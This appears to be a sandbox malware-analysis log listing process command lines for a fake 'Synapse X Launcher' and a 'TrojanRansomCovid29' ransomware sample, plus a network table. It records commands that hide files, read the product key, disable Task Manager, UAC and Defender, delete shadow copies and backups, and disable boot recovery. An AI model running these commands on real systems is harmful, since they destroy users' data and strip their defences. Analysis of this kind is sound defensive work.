"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5212 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2392 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5248 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5160 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=3124 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=4772 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5184 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x494
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5404 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3188 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5824 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6040 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6084 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5960 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Synapse\" -spe -an -ai#7zMap28849:76:7zEvent22372
C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe
"C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe
"C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
C:\Windows\system32\tasklist.exe
TASKLIST /FI "STATUS eq RUNNING"
C:\Windows\system32\find.exe
find /V "Image Name"
C:\Windows\system32\find.exe
find /V "="
C:\Windows\SYSTEM32\attrib.exe
attrib +H "C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\wmic.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Users\Admin\Downloads\Synapse\Patcher.exe
"C:\Users\Admin\Downloads\Synapse\Patcher.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat
C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
C:\Windows\system32\tasklist.exe
TASKLIST /FI "STATUS eq RUNNING"
C:\Windows\system32\find.exe
find /V "Image Name"
C:\Windows\system32\find.exe
find /V "="
C:\Windows\SYSTEM32\attrib.exe
attrib +H "C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\wmic.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6164 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5416 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5456 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=2652 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=3300 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5532 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1464 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6408 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Users\Admin\Downloads\VC_redist.x64.exe
"C:\Users\Admin\Downloads\VC_redist.x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6488 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Downloads\VC_redist.x64.exe" -burn.filehandle.attached=564 -burn.filehandle.self=560
C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{2738ABA1-27DA-4E9E-B44A-A526DE1DFE84} {90B3FE9F-47E3-437B-AE33-370ECB166255} 2724
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={c649ede4-f16a-4486-a117-dcc2f2a35165} -burn.filehandle.self=1100 -burn.embedded BurnPipe.{5866C52B-8439-40CA-A11C-CB89A98A2158} {EAA41EBB-D1D8-46A3-9F01-0E3875E0FD73} 1112
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={c649ede4-f16a-4486-a117-dcc2f2a35165} -burn.filehandle.self=1100 -burn.embedded BurnPipe.{5866C52B-8439-40CA-A11C-CB89A98A2158} {EAA41EBB-D1D8-46A3-9F01-0E3875E0FD73} 1112
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{26A52D87-4D8E-4056-881C-149783083089} {55FAA5F6-175E-44FE-B59C-0272A389FF4D} 5980
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\testy.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=5676 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5136 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6468 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6048 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6120 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5548 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6360 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1640 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Users\Admin\Desktop\ScaryInstaller.exe
"C:\Users\Admin\Desktop\ScaryInstaller.exe"
C:\Users\Admin\Desktop\TrojanRansomCovid29.exe
"C:\Users\Admin\Desktop\TrojanRansomCovid29.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63FF.tmp\TrojanRansomCovid29.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\63FF.tmp\fakeerror.vbs"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68B2.tmp\creep.cmd" "
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe
Cov29Cry.exe
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 9
C:\Users\Admin\AppData\Local\Temp\68B2.tmp\CreepScreen.exe
CreepScreen.exe
C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\68B2.tmp\melter.exe
melter.exe
C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29LockScreen.exe
Cov29LockScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\68B2.tmp\scarr.mp4"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 172.217.16.238:443 | consent.google.com | tcp |
